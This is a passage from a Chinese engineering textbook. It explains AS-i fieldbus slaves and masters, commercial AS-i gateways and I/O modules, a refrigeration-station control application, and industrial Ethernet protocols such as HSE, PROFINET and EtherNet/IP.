程中,AS⁃i总线的传输系统起了通路和桥梁的作用。在传输系统中,报文信号要经过多次的变换和恢复,并要抵抗各种外界的干扰,保证准确、快捷、可靠的信息交换。报文信号是AS⁃i总线系统中重要的组成部分。8.2AS⁃i总线的从机与主机8.2.1AS⁃i从机1.从机的组成AS⁃i从机的逻辑功能结构图如图8⁃3所示,与传感器/执行器的连接用接口1,与AS⁃i通信电缆的连接用接口2。AS⁃i电缆的两根导线分别对应着AS⁃i+和AS⁃i-,“+”“-”表示电源的极性。图中D0~D3为数据输入/输出口,另有数据选通口,参数输出口为P0~P3,还有参数选通口、复位口,Uout为供给传感器/执行器的电源。 标准的AS⁃i从机有7个逻辑功能块,分别是“电源供给”“发送器”“接收器”“顺序控制器”“数据输入输出”“参数输出”和“复位电路”,从机专用芯片中一般也会集成“永久存储单元(EEPROM)”,少数情况下为一个外接的存储芯片。AS⁃i从机的中央处理单元是“顺序控制器”,从机的一切逻辑功能都由它来完成,通过“接收器”接收来自主机的请求命令,并进行解码,检查它们是否正确,如果正确就开始执行主机的命令,除此之外,它还要通过“数据输入输出”单元和“参数输出”单元把参数和数据传递给传感器/执行器,如果需要的话,还要向主机发送一个已正确接收的响应信息,此步骤通过“发送器”单元来实现。“顺序控制器”可以把来自主机的地址分配存储在“永久存储单元”中,即使在断电的情况下也可以保留来自主机的地址。在“接收器”中,经过滤波和数字化处理从AS⁃i电缆上侦察到的信息电压脉冲后,把该脉冲写进从机存储器的“接收寄存器”中,同时将接收到的信息进行合理的测试,保证没有干扰和破坏主机发过来的数据。2.从机的工作流程从机在数据交换时所经历的各个工作状态以及不同的工作流程如图8⁃4所示,此工作流程适用于参数和数据的传递。需要注意的是在主机向从机发送数据之前,要先向从机发送“写参数”命令,复位“数据交换禁止位”,进行数据通信。可由“复位(RESET)”信号启动从机回答,另外在上电、内部短路、外部过载和电压持续低于正常工作电压的情况下,都会引发“复位(RESET)”信号。1)在“复位(RESET)”信号到来时,AS⁃i从机进入“开始启动(INIT)”状态,执行如下操作:①复位输出口内部的所有缓存器和标志位。置位“数据交换禁止位”,以禁止此时AS⁃i电缆上的无用信号的干扰并等待主机的请求呼叫;②在第一次正确接收到主机的“写参数”报文时,复位“数据交换禁止位”。从永久存储单元中读出从机地址到地址缓冲器中,读出I/O和ID号到I/O配置和ID编码缓存器中。考虑到安全方面的因素,在存储单元中把地址、I/O和ID都存储了两次,“开始启动(INIT)”成功以后则进行下一步操作。2)进入“异步(ASYNC)”状态。从机接收AS⁃i线上的数据,将其保存到“接收缓存器”中,然后作下一步操作。3)进入“接收(RECEIVE)”状态。从主机报文的起始位开始读信息,执行检测程序。可以检测出以下错误:起始位错误、交换错误、信息错误、校验位错误、结束位错误和信息长度错误。只要测出其中有一条错误,将会视所传输的信息为错误信息。这种检验是由几个逻辑链接执行的,而且处理过程只占用“顺序控制器”一小部分时间。如果产生错误,从机就会产生应答信息,主机会等待并通过监控自己的暂停周期来发现被呼叫的从机是否有响应,如果需要,主机会重新发出这条请求呼叫。“顺序控制器”会把从主机报文读到的信息和本身存储的内容进行比对,如果发现有不同,就会置位状态缓存器的S3(存储单元读取地址出错,S3是从机配置的状态寄存器的一个标志位,在从永久存储单元读取地址出错时被置位)。如果出现分配地址时断电以及没有正确完成向“永久存储单元”的存储的情况,也会置位S3。如果出现错误,从机会重新回到“异步(ASYNC)”状态,等待下一个轮询周期,主机在得不到应答的情况下就会呼叫下一个从站。如果没有出现错误,而且从机正确接收了呼叫命令,则会进入下一个状态。4)从机进入“译码(DECODE)”状态。在此状态下,首先要看状态缓存器的S3是否被置位,即存储单元地址是否出错,如果出错,就会回到“同步(SYNC)”状态,然后再次进入“接收(RECEIVE)”状态;如果发生“地址错误”,经过“延时(WAIT)”和“同步(SYNC)”处理后也会再次进入“接收(RECEIVE)”状态。这个过程从机不会产生响应。5)若呼叫和地址都正确,经过“传输(TRANSMIT)”状态后进入“同步(SYNC)”状态,并向总线发出应答信号,然后再次进入“接收(RECEIVE)”状态,等待主站的下一次呼叫。6)若传输过程发生故障,则会重启AS⁃i从机并返回“开始启动(INIT)”状态。8.2.2AS⁃i主机1.主机工作模式按照AS⁃i的通信协议,主机可以与周边从机设备进行数据交换。在AS⁃i的通信协议中,由执行控制层来完成主机和从机之间的数据交换,为了达到不同的要求,主机在正常的工作周期中有两种工作模式:(1)配置模式在此模式下,无须与主机内存中的参考配置进行核对,所有连接在电路中的从机都被激活,并参加数据交换。在与主机永久性配置数据不一致的情况下,允许对系统进行操作,由于不进行参考配置核对,不能实现自动地址设定功能,这种模式在系统配置组态时使用。(2)运行保护模式在此模式下主机将只与“激活从机列表(LAS)”中的从机进行通信,并自动测试AS⁃i总线的配置。从机只有位于“可测从机列表(LDS)”中,且其实际配置与参考配置相一致时才能被激活,此时,可以进行的操作有数据交换和自动地址设定,这种模式在系统实际工作时使用,如果发现错误,将向主机接口层报告错误信息。2.主机的工作流程主机在工作过程中,从离线状态到进入执行控制状态要经历几个阶段,如图8⁃5所示。首先在离线阶段上电(或在操作过程中主机进行重启),要先进行“初始化”,然后开始执行“启动操作”,所有物理连接的从机都在监测阶段进行记录,随后在激活阶段被激活,最后进入“周期性的正常操作”之中,开始数据交换、管理和系统扩展。“执行控制层”在正常的工作周期中执行着两个平行的过程:传输功能:控制数据在主机和从机之间进行交换;管理功能:执行应用层命令,并实现自动地址设定功能。 (1)初始化主机在离线阶段完成“初始化”操作,然后在配置模式下完成主机基本配置信息的设置。此时,所有从机的输入都置0,输出都置1(AS⁃i从机在上电或重启后的特征输出值)。通过设定离线标志位,可以从其他任何状态下将“执行控制层”置回离线状态,在发送报文的传输线路电压过低时,也会自动回到离线状态。实际上,离线标志位的功能和PLC中的命令“Halt”一样,通过对它的设置也可以重新启动主机。(2)启动操作“执行控制层”在“启动操作”中检测并激活所有功能正常的从机,启动操作分为检测和激活两个阶段。(3)周期性的正常操作启动成功之后,主机将进入周期性的正常操作运行期,在此期间主机与从机间进行数据交换。数据交换、管理和系统扩展三个阶段组成了一个完整的AS⁃i周期。数据交换阶段结束后,将进入管理阶段。在管理阶段,由于报文每周期只发送一次,因此要通过多个周期才能完成一些需要多次呼叫的功能。管理阶段可以完成的功能有:①设定从机参数值;②读取从机状态;③读取某一个从机的I/O配置和ID编码;④将某从机的操作地址置0;⑤为地址为0的从机设定新的操作地址;⑥对某从机进行重启等。在没有指令提交和报文传输时,将进入系统扩展阶段。在每个AS⁃i周期结束时,可以寻到新引入的从机。8.3AS⁃i技术应用8.3.1AS⁃i总线系统工业模块和元器件1.网关网关既是AS⁃i的“心脏”,也是AS⁃i总线系统的主站。将下层的I/O信号传送给上层的PLC控制系统就是网关的主要任务,客户可以将网关看作是一个大量I/O信号的采集卡,不管上层总线如何变化,都不会影响到下层的I/O模块。当正确连接传感器和执行器后,便可十分方便地进行PLC方面的编程。图8⁃6带CC⁃Link接口的K20网关(1)K20网关VBG⁃CCL⁃K20⁃D⁃BV是一种带CC⁃Link接口的K20网关,如图8⁃6所示,它既是AS⁃i的主站,也是CC⁃Link的从站,占用3个站号,可通过液晶面板和按钮来设置地址和波特率,同时不需要经过上层的CC⁃Link总线就可以调试和诊断AS⁃i系统。面板菜单支持中文,可以方便客户选择操作。网关外壳选用不锈钢材质,防护等级为IP20,适合用在控制箱内。它可以连接普通I/O模块和安全模块,在同一个网络里传输I/O信号和安全信号。VBG⁃PN⁃K20⁃DMD是一种带PROFINET接口的K20系列双网关,如图8⁃7所示。它可同时连接两个AS⁃i网络,同样采用K20系列网关的不锈钢外壳,符合AS⁃iV3.0规范,可连接更高一层的PROFINET控制器;VBG⁃PN⁃K20⁃DMD带有EIA⁃232诊断接口,加上相应的配套软件AS⁃iControlTool就可以直接从网关中读出数据和网络状态。其面板上有7个LED灯,可用于诊断AS⁃i网络的状态,4个面板按钮可操作液晶面板上显示的菜单。(2)K30网关如图8⁃8所示,VBG⁃PBS⁃K30⁃DMD是一种带PROFIBUS⁃DP接口的K30网关。它是AS⁃i的主站,也是PROFIBUS的子站,经过循环和非循环数据交换,AS⁃i的功能都可以通过PROFIBUS⁃DPV1来实现。该网关可同时连接两个AS⁃i网络,符合最新的AS⁃iV3.0规范,并遵守PROFIsafe协议,可进行更高层次的操作。网关带有4个输入和4个输出,4个输入可用作外部设备监视(EDM)信号输入,4个输出包含了2路继电器输出和2路半导体电子输出。网关外壳采用不锈钢材质,防护等级为IP20。网关上带有液晶显示屏和按钮,方便用户操作和诊断,不需要通过PROFIBUS专门的组态程序就可以给子站分配地址、改变PROFIBUS地址和波特率、监视输入和输出信号、快速组态网络。如图8⁃9所示,网关前面板上集成了一个圆形6针的EIA⁃232串行诊断接口,可用于连接调试软件AS⁃iControlTools和安全组态软件ASiMONG2。还有一个芯片卡插口,如图8⁃10所示,芯片卡的作用是:①存储系统和安全组态数据;②在替换损坏的网关时可非常方便地保留组态信息。 2.电源AS⁃i电源是AS⁃i网络中不可缺少的一部分,不同于一般的直流电源,它除了给AS⁃i回路提供DC30V的电源外,还负责数据去耦功能,如图8⁃11所示。数据信号和直流电源能在同一根电缆上传输。VAN⁃115/230AC⁃K27是一个标准的AS⁃i电源,如图8⁃12所示。可输入AC115V或AC230V,在面板上有开关可供选择,输出为DC30V/4A。电源带有接地监测功能(EarthFaultDetect,EFD),若发生接地错误,电源会输出一个继电器信号(常闭触点),通过上层控制程序关断电源,还可以通过“RESET”键使电源重启复位。 3.I/O模块I/O模块是AS⁃i网络中重要的部件,也是AS⁃i总线系统中的从站(Slave),它的作用是接收传感器的信号并传给网关,再给继电器和各种阀门等执行器发送PLC指令。现场型I/O模块有以下几种:(1)KE型I/O模块KE型I/O模块用于控制箱,如图8⁃13所示。面板上带有LED诊断指示灯,可进行快速诊断,用彩色标记可移动端子,方便接线。KE型I/O模块有标准地址和扩展地址模块,可配合不同AS⁃i规范的网关使用。输入可连接2线、3线或4线制传感器,可输出电子开关(PNP型)信号和继电器信号,防护等级为IP20,适合用在控制箱内。(2)G12扁平I/O模块G12扁平I/O模块如图8⁃14所示。①它带有不锈钢卡扣,合上就能将电缆压接好,无须多余工具;②带有电缆槽底座,可反转方向,便于电缆安装;③浇注式外壳(PBT),防护等级高达IP67/IP68/IP69K;④带有SPEEDCON技术的M12不锈钢连接头,方便信号的快速连接;⑤LED灯能指示输入输出信号的各种状态,便于现场快速诊断。(3)G11圆形I/O模块G11圆形I/O模块如图8⁃15所示。①采用全浇注外壳,坚固耐用、抗冲击、耐水压冲洗;②LED灯能指示输入输出信号的各种状态,节省现场诊断时间;③圆形设计便于扁平电缆从任何方向布线,可通过扁平电缆或M12接头来与AS⁃i网络连接,适合用户不同的需求;④完美的密封设计,抗老化材料(PBT)的采用,使得防护等级高达IP68/IP69K;⑤兼容最新的AS⁃iPOWER24标准,使得网关更小,无须专用的AS⁃i电源。(4)G10紧凑I/O模块G10紧凑I/O模块如图8⁃16所示。①带有超紧凑的外壳,可以安装在非常狭窄的电缆槽或电缆桥架内,适用于分散的只有少量I/O点的场合;②带电缆的M12接头可直接连接传感器,无须另外接线;③LED灯能指示输入输出信号的各种状态,节省现场诊断时间;④连体式外壳只需嵌入扁平电缆,将面板旋转盖置于顶部,拧紧中心螺钉即可,满足现场快速安装的要求。(5)CB印制电路板型I/O模块CB印制电路板型I/O模块,如图8⁃17所示。它的尺寸很小,连端子一起才29mm高,可安装在小型控制盒或按钮盒中,适用于连接小型的光电传感器和LED灯。I/O端口最多可连接4输入和4输出,通过可移动端子或预制接线连接。(6)安全I/O模块VAA⁃2E2A⁃G12⁃SAJ/EA2L是安全I/O模块,如图8⁃18所示。它是集成了G12模块优越性能的安全I/O模块,有两个安全输入和两个标准电子输出(PNP),安全输入可连接机械触点(如急停开关),也可监视交叉回路,通过AS⁃i网络供电。可通过PLC来置位输出信号,通过辅助电源供电以及对内部参数(P1位)的设置,可设置输入与输出之间的逻辑关系,即输入有信号可直接使输出响应置位,对于现场应用来说非常实用。(7)紧凑性安全模块VAA⁃2E1A⁃G10⁃SAJ/EA2J⁃2X1M是紧凑性安全模块,如图8⁃19所示。它是具有G10超紧凑性能的安全模块,有2个安全输入和1个非安全输出,无须辅助电源,直接通过AS⁃i网络供电。 4.总线型传感器总线型传感器是集成了AS⁃i从站专用芯片的传感器,本身即带有AS⁃i从站接口,它除了具有同类型普通传感器的功能外,还是AS⁃i系统上的一个从站I/O模块。传感器的输入和输出状态可用模块上的数据位(D0,…,D3)来表示,参数位(P0,…,P3)可用作诊断功能。(1)总线型阀门回讯传感器这是一种双电感式传感器,用于检测和控制阀门位置,能驱动线圈,用两个螺钉直接安装在阀门上,检测旋转开度,无须调整。通过M12X1快速连接器连接到AS⁃i系统上,D1数据位可监视线圈的短路和断路。黄色LED显示开关电流状态,双LED显示线圈状态和故障指示。总线型阀门回讯传感器如图8⁃20所示。(2)总线型光电传感器它有亮通(LightOn)和暗通(DarkOn)两个功能,可通过参数位P1来设定,还可通过参数位P2来设置定时功能,D0数据位表示传感器信号的输出状态,D1数据位用来表示弱信号输出的警报,D2数据位作测试功能。(3)总线型旋转编码器旋转编码器是一种转角传感器,它有单圈13位的分辨率,也有多圈16位的分辨率,因为精度要求高达16位,所以又不同于其他AS⁃i传感器的通信方式。这种传感器一般带有4个AS⁃i芯片,在编址时也占用4个地址,对应的每个循环就可以传送16位数据,相当于4个子站依次传输4位数据,再组合成16位数据。总线型旋转编码器如图8⁃22所示。(4)总线型电感传感器由于它采用了耐用的PBT材料,因此具有抗磨损和良好的机械特性,可防化学物质、油脂和水的侵蚀。在常开或常闭触点功能上有不同的设计,这在参数位P1上可进行选择,P0用作输入过滤器的信息,数据位D2用于错误报警、线圈破损、振荡器损坏等指示,输出信号一般用数据位D0来表示。总线型电感传感器如图8⁃23所示。 5.系统附件网关与各种类型的I/O模块连接需要不同类型的安装附件,它们是AS⁃i网络不可缺少的元器件。多种类型的G10分线器如图8⁃24所示,它采用PBT材料,表面进行了光滑设计,耐清洗剂清洗,具有更高的IP68/IP69K防护等级。有三种类型,分别是:①扁平电缆转圆形电缆,带M12螺母接头,可用于直接连接带M12公接头的I/O模块;②扁平电缆转出线端子,可用于连接控制箱型I/O模块;③扁平电缆分接器,其中两个电缆槽并联,可用于扁平电缆分接转向等。8.3.2AS⁃i总线在制冷站辅助控制系统中的应用1.系统概述本控制系统是某企业动力车间制冷站的辅助控制系统,该制冷站控制系统为基于PROFI⁃BUS总线的现场总线控制系统(FCS)。该控制系统是基于AS⁃i总线的更底层与更简单的FCS,是其子系统,主要管理制冷站中的非核心设备和零散分布的手动控制开关及信号灯等。本应用所介绍的制冷站的辅助控制系统主要管理6台大功率冷却水泵、3座冷却塔、2台补水泵以及手动按钮和信号灯等。大功率冷却水泵的电动机需要实现软起动功能,其他设备的电动机只实现起停功能即可,由此可见本系统的控制对象基本是简单的开关量元器件,而且相对零散地分布在整个车间内,这种情况最适宜发挥AS⁃i总线的优势。如果将以上设备纳入基于PROFIBUS总线的FCS,不分设为制冷站控制系统的子系统,不但会使控制系统结构复杂,而且采购成本也会变高。此外,AS⁃i总线的主站除了需要管理AS⁃i总线中的全部从站外,该站还是上层PROFI⁃BUS总线的主站,负责与PROFIBUS总线从站通信,并需要将整个制冷站控制系统的信息与企业的工业以太网相联。该主站不但是制冷站辅助控制系统的核心,而且是整个制冷站控制系统的核心,系统要求其必须具有高可靠性与高性能。2.系统网络架构本控制系统的主要控制对象是多台不同功率的电动机,控制这些电动机起停的传感器已经连入基于PROFIBUS总线的制冷站控制系统中,由该系统向本AS⁃i总线系统发送控制指令,本系统只有最基本的手动控制功能。这些电动机和控制按钮等分布在90m的范围内,相对比较分散。整个系统的网络架构如图8⁃25所示。AS⁃i的主站担负着系统的管理职能和与上层通信的职能,因此选用具有较强通信能力的西门子公司的S7⁃300系列CPU315⁃2PN/DP作为AS⁃i总线的主站,它有2个PROFINET接口,1个PROFIBUS⁃DP接口。由于该PLC不是专为AS⁃i总线设计的,需要为其连接一个CP243⁃2型AS⁃i主站模块才能连入AS⁃i总线。采用PLC加AS⁃i主站模块的方式构成AS⁃i主站,这样做有一定的优势,比如减少设备投资,主站PLC利用剩余的I/O接口可以驱动一些就近的设备;另外可以作为与其他网络连接的网关,本系统就是充分利用了PLC本身的网络接口,不但连接了PROFIBUS⁃DP总线,也实现了与上层工业以太网PROFINET的连接,而且可以利用已有的PLC软件资源。但是,由于S7⁃300系列PLC不是专为AS⁃i设计的控制器,所以在AS⁃i系统中使用时,就没有其他厂商专为AS⁃i设计的控制器方便。综合分析利弊,在本设计中采用该方案是较为合理的。AS⁃i的1#~3#从站用于控制6台大功率冷却水泵电动机的软起动,将6台电动机分为3组,每个从站控制2台电动机。由于大功率电动机的软起动需要2台接触器,共需要4路输出,所以从站模块选择S8.0型P+F公司生产的4输出VAA⁃4A⁃K3⁃R从站模块。AS⁃i的4#和5#从站用于控制信号灯和手动按钮,选择S7.0型Lumberg公司生产的4输入/输出IBA4E/4A从站模块。AS⁃i的6#从站用于控制3台冷却塔风扇的电动机,该电动机功率较小,可以直接控制起停,所以从站模块选择S8.0型P+F公司生产的4输出VAA⁃4A⁃K3⁃R从站模块。AS⁃i的7#从站用于控制2台补水泵的电动机,该电动机功率较小,可以直接控制起停,所以从站模块选择S3.0型BRADHARRISON公司生产的2输入/输出TAS⁃422⁃CD4⁃00从站模块。AS⁃i的主电源是AS⁃i系统的一个重要组成部分,该电源的供电线与AS⁃i总线的信号线共用一根特制的黄色AS⁃i电缆,主电源负责电源供应、平衡网络、数据解耦和安全隔离等。选用IFM公司的AC1216型电源,该电源的主要参数为INPUT:AC85~220V/2.0~0.9A;OUTPUT:DC24V/2.8A。AS⁃i的辅助电源是在AS⁃i主电源供电不足时的补充,不是每个AS⁃i系统必备的,本应用介绍的系统耗电量较小,不需要辅助电源。AS⁃i的辅助电源与AS⁃i的主电源不同之处在于,其采用一根不同于AS⁃i黄色电缆的黑色辅助供电电缆,在实际应用中要注意这点。3.系统设计要点与AS⁃i使用注意事项本控制系统的设计要点是AS⁃i主站,该站不但是AS⁃i的管理核心,也是上层PROFI⁃BUS总线甚至更高层PROFINET网络的重要通信节点。在设计时一定注意选用高可靠性与高性能设备。AS⁃i总线在设计时应注意:第一,其网络拓扑结构较自由,可以是线形,可以有分支,可以是树形,但是不可以是环形;第二,环境依存度小,AS⁃i电缆不需终端电阻,可以不用屏蔽电缆;第三,便于处理开关量信号,AS⁃i可以处理模拟量信号,但是其优势在于低成本、简便可靠地连接开关型设备,因此AS⁃i总线连接的大部分传感器与执行器应为开关量信号。 第9章工业以太网技术 为了促进以太网在工业领域的应用,国际上成立了工业以太网协会(IndustrialEthernetAssociation,IEA)、工业自动化开放网络联盟(IndustrialAutomationOpenNetworkAlliance,IAONA)等组织,其目标是在世界范围内推进工业以太网技术的发展、教育和标准化管理,在工业应用领域的各个层次运用以太网。美国电气电子工程师协会也正着手制定现场装置与以太网通信的标准,这些组织还致力于促进以太网进入工业自动化的现场级,推动以太网技术在工业自动化领域和嵌入式系统中的应用。9.1工业以太网技术概述所谓工业以太网是指技术上与商用以太网(IEEE802.3标准)兼容,但在产品设计时,在材质的选用、产品的强度、实用性以及实时性等方面能满足工业现场的需要。简言之,工业以太网就是在工业控制系统中使用的以太网。 从图9⁃1可以看到,工业以太网的物理层与数据链路层采用IEEE802.3规范,网络层与传输层采用TCP/IP组,应用层的一部分可以沿用上面提到的互联网应用协议。这些沿用的部分便发挥了以太网的优势和核心技术。工业以太网如果改变了这些已有的优势部分,就会削弱甚至丧失它在控制领域中的生命力,因此工业以太网标准化的工作主要集中在ISO/OSI参考模型的应用层,需要在应用层添加与自动控制相关的应用协议。目前工业以太网技术的发展体现在以下几个方面。1.通信确定性与实时性工业控制网络必须满足控制作用对通信实时性的要求,即信号传输要足够快且满足信号的确定性,这是工业控制网络不同于普通数据网络的最大特点。实时控制往往要求对某些变量的数据准确性定时刷新。由于以太网采用的是CSMA/CD的介质访问控制方式,在网络负荷较大时,网络传输的不确定性不能满足工业控制的实时要求,因此传统以太网技术难以满足控制系统要求准确定时通信的实时性要求,一直被视为非确定性的网络。快速以太网与交换式以太网技术的发展,给解决以太网的非确定性问题带来了新的契机,具体内容体现在以下几个方面:(1)提高通信速率目前以太网的通信速率从10Mbit/s、100Mbit/s增大到如今的1000Mbit/s、10Gbit/s甚至更高。相对于一般的控制网络传输通信速率的几十千位每秒、几百千位每秒、1Mbit/s和5Mbit/s而言,通信速率的提高非常明显,而且对减少碰撞冲突也是有效的。在相同通信量的条件下,提高通信速率可以减少通信信号占用传输介质的时间,在为减少信号的碰撞冲突、解决以太网通信的非确定性方面提供了有效途径。(2)控制网络负荷减少信号的碰撞冲突,提高网络通信的确定性的另一个角度是减轻网络负荷。控制网络的通信量不大,随机性、突发性通信的机会也不多,其网络通信大都可以事先预计并对其做出相应的通信调度安排。如果在网络设计的过程中能够正确地选择网络的拓扑结构、控制各网段的负荷量、合理分布各现场设备的节点位置等,就可以在很大程度上避免冲突的发生。研究结果表明,以太网基本可以满足对控制系统通信确定性的要求的条件是:网络负荷低于满负荷的30%。(3)采用以太网的全双工交换技术采用星形网络拓扑结构,交换机将网络划分为若干个网段。交换机具有数据存储和转发的功能,使各端口之间输入和输出的数据帧能够得到缓冲而不再发生冲突;同时,交换机还可对网络上传输的数据进行过滤,使每个网段内节点间数据的传输只限在本地网段内进行,不需经过主干网,也不占用其他网段的带宽,从而降低了所有网段和主干网的网络负荷。采用全双工通信也可以明显提高网络通信的确定性。半双工通信时,一条网线只能发送或者接收报文,无法同时进行发送和接收;而全双工设备可以同时发送和接收数据。在一个用5类双绞线连接的以太网中,若一对线用来发送数据,另外一对线用来接收数据,则一个100Mbit/s的网络提供给每个设备的带宽有200Mbit/s。换句话说,采用全双工交换式以太网能够有效地避免冲突,更能满足确定性网络的要求。应该指出的是,控制网络中以太网的非确定性问题尚在解决之中,采取上述措施可以使其非确定性问题得到相当程度的缓解,但还没有从根本上解决,包括我国在内的许多国家都在积极开发工业以太网技术。2.稳定性与可靠性以太网所使用的接插件、集线器、交换机和电缆等均是为商用领域而设计的,未考虑较恶劣的工业现场环境(冗余直流电源输入、高温、低温和防尘等),因此商用网络产品不能应用在有较高可靠性要求的恶劣工业现场环境中。上述问题随着网络技术的发展正在迅速得到解决。为了解决在不间断的工业应用领域、极端条件下网络也能够稳定工作的问题,美国Synergetic微系统公司和德国赫斯曼(Hir⁃schmann)、JetterAG等公司专门开发和生产了导轨式集线器和交换机产品,安装在标准DIN导轨上,并由冗余电源供电,接插件采用牢固的DB9结构。台湾四零四科技股份有限公司在2002年6月推出工业以太网产品———工业以太网设备服务器,特别设计用于连接工业应用中具有以太网络接口的工业设备(如PLC、HMI和DCS系统等)。对以太网的总线供电规范也在IEEE802.3af标准中进行了定义。除此之外,实际应用中主干网可采用光纤传输,现场设备的连接则可采用屏蔽双绞线,对于重要的网段还可采用冗余网络技术来提高网络的抗干扰能力和可靠性。3.工业以太网协议工业自动化网络控制系统不仅能够完成数据传输,而且还是一个自控系统,能够借助网络完成控制功能。它除了完成数据传输之外,还需要依靠所传输的数据和指令来执行某些控制计算与操作功能,由多个网络节点协调完成自控任务。因而它需要在应用、用户等高层协议与规范上满足开放系统的要求,满足互操作条件。对应于ISO/OSI七层通信模式,以太网技术规范只映射为其中的物理层和数据链路层,而在其之上的网络层和传输层协议,目前以TCP/IP为主(已成为以太网之上传输层和网络层“事实上的”标准),而对较高的层次,如会话层、表示层和应用层等没有作为技术规范。目前商用计算机设备之间是通过文件传输协议(FTP)、远程登录协议(Telnet)、简单邮件传输协议(SMTP)、WWW协议(HTTP)和简单网络管理协议(SNMP)等应用层协议进行信息的透明访问,这些协议如今在互联网上发挥了不可替代的作用,但不足之处是其所定义的数据结构等特性不适合应用于工业过程控制领域现场设备之间的实时通信。9.2工业以太网协议为了满足工业现场控制系统的应用要求,必须在以太网和TCP/IP之上建立完整有效的通信服务模型,制定有效的实时通信服务机制,协调好工业现场控制系统中实时和非实时信息的传输服务,形成为广大工控生产厂商和用户所接受的应用层、用户层协议,进而形成开放的标准。为此,各现场总线组织纷纷将以太网引入其现场总线体系中的高速部分,利用以太网和TCP/IP技术以及原有的低速现场总线应用层协议,构成工业以太网协议,如HSE、PROFINET和Ethernet/IP等。1.HSE现场总线基金会在摒弃了原有高速总线H2之后,形成了高速以太网(HSE)这一新作。现场总线基金会明确将HSE定位成实现控制网络与互联网的集成,由HSE链接设备将H1网段信息传送到以太网的主干上并进一步送到企业的ERP和管理系统。操作人员在主控室可以直接使用网络浏览器查看现场设备运行情况,现场设备同样也可以从网络上获得控制信息。HSE与OSI参考模型的比较如图9⁃2所示。物理层与数据链路层采用以太网规范,这里指的是100Mbit/s的以太网,网络层采用IP,传输层采用TCP/UDP,而应用层是具有HSE特色的现场设备访问(FieldDeviceAccess,FDA)。像H1那样,在标准的七层模型之上增加了用户层,并按H1的惯例,HSE把从数据链路层到应用层的相关软件功能集成为通信栈,称为HSEStack。用户层包括块功能、设备描述和网络与系统管理等功能。通过连接设备(LinkingDevice),FFHSE将FFH1网络连接到HSE网段上。如图9⁃3所示,HSE连接设备同时也具有网桥和网关的功能,网桥功能用来连接多个H1总线网段,使不同H1网段上的H1设备之间能够进行对等通信,而无需主机系统的干预。HSE主机可以与所有的连接设备和连接设备上挂接的H1设备进行通信,使操作数据能传送到远程的现场设备,并接收来自现场设备的数据信息,实现监控和报表功能。监控和控制参数可直接映射到标准功能块或者“柔性功能块(FFB)”中。 2.PROFINET图9⁃4PROFINET网络通信模型PROFIBUS国际组织针对工业控制要求和PROFIBUS技术特点,提出了基于以太网的PROFINET。PROFINET主要包含三方面的技术:1)基于通用对象模型(COM)的分布式自动化系统。2)规定了PROFIBUS和标准以太网之间的开放、透明通信。3)提供了一个包括设备层和系统层、独立于制造商的系统模型。PROFINET网络通信模型如图9⁃4所示,以标准TCP/IP与以太网作为连接介质,采用标准TCP/IP加上应用层的远程过程调用协议/分布式组件对象模型(RPC/DCOM)来完成节点之间的通信和网络寻址,可以同时挂接传统PROFIBUS系统和新型的智能现场设备。如图9⁃5所示,现有的PROFIBUS网段可以通过一个代理设备(Proxy)连接到PROFINET网络当中,使整套PROFIBUS设备和协议能够原封不动地在PROFINET中使用。传统的PROFIBUS设备可通过Proxy与PROFINET上面的COM对象进行通信,并通过OLE自动化接口实现COM对象之间的调用。3.Ethernet/IPEthernet表示采用Ethernet技术,也就是IEEE802.3标准,IP表示工业协议,以区别于其他Ethernet协议。不同于其他工业Ethernet协议,Ethernet/IP采用了已经被广泛使用的开放协议,也就是控制与信息协议(ControlandInformationProtocol,CIP)作为其应用层协议。所以,可以认为Ethernet/IP就是CIP在Ethernet、TCP/IP基础上的具体实现。这一关系如同DeviceNet就是CIP在控制器局域网(CAN总线)上的具体实现一样。图9⁃6所示为Ethernet/IP的分层模型。Ethernet/IP是以太网、TCP/IP以及CIP的集成,Ethernet/IP和DeviceNet以及ControlNet采用了相同的应用层CIP规范,只是在OSI协议七层模型中的低4层有所不同。Ethernet/IP在物理层和数据链路层采用Ethernet技术,在传输层和网络层采用TCP(UDP)/IP技术。由于在应用层采用了CIP,Ethernet/IP也具备CIP网络所共有的一些特点,包括:1)能够传输多种不同类型的数据,包括I/O数据、配置和故障诊断、程序上下载等。2)面向连接,通信之间必须建立连接。3)用不同的方式传输不同类型的报文。4)基于生产者/消费者模型,提供对多种通信的支持。5)支持多种通信模式,如主从、多主、对等或者三者的任意组合。6)支持多种I/O数据触发方式,如轮询、选通、周期或状态改变等。7)用对象模型来描述应用层协议,方便开发者编程实现。8)为各种类型的Ethernet/IP设备提供设备描述,保证互操作性和互换性。Ethernet/IP支持显性和隐性报文,使用的是目前流行的商用以太网芯片和物理媒体。如图9⁃7所示,Ethernet/IP工业以太网采用有源星形拓扑结构,一组装置点对点地连接到交换机,具有接线简单、故障查找容易和维护方便等优点。9.3工业以太网应用9.3.1PROFINETCBA技术1.概述PROFINET基于组件的自动化(Component⁃BasedAutomation,CBA)技术是一种实现分布式装置、机器模块和局部总线等设备级智能模块自动化应用的概念。如果做一个比较,就会马上对CBA有一个初步的认识。PROFINETIO的控制对象是工业现场分布式IO点,这些IO点之间进行的是简单的数据交换;而CBA的控制对象是一个整体的装置、智能机器或系统,它的IO之间的数据交换在它们内部完成,这些智能化的大型模块之间通过标准的接口相连,进而组成大型系统。工业生产过程中存在着许多功能相同的装置或工艺过程相似的环节,自动化领域的发展已经进入创建模块化装置和机器的阶段,可以把这些典型装置或环节做成标准的组件模型,在使用它们时只需要进行简单的外部连接即可完成复杂的控制任务。PROFINETCBA就是使用基于预组装组件的技术来完成分布式自动化任务的。如图9⁃8所示,在一个典型的饮料生产线中,可以把清洗、灌装、封口和包装等环节都各自看成单独的一个整体环节,每个环节完成自己的任务,工作按顺序依次进行,这些不同的子系统或设备可以由一家或多家制造商来开发测试和投入运行。工程技术人员所关心的仅仅是每个模块与外界的接口规定,而不必去关心它们内部是如何完成各自控制任务的。由此可以看出PROFINETCBA具有以下优点:1)大大减少了设计工作量。2)组件之间只需少量的接口完成级联。3)每个模块都具有高度的自治性,从测试到诊断都无须对整个系统进行操作。4)单个组件调试可提前进行,从而使系统总体调试简单化。5)系统维护变得容易。2.工艺技术模块和组件模块在以上饮料生产线的例子中,每个独立的环节在组成上都有相似的地方,那就是它们都是由机械、电气/电子设备和控制逻辑(软件)来实现其功能的。由这些要素构成的整体单元就是工艺技术模块(TechnologyModule),所以说一个工艺技术模块代表的是一个专用的组件,它包括机械的、必需的电控装置和相关软件。在划分和定义工艺技术模块时,必须周密地考虑在不同使用设备中它们的可复用性、成本和实用性。划分得过小过细,就会定义太多的IO参数,增加设计成本和管理难度;划分得过大过粗,则会降低其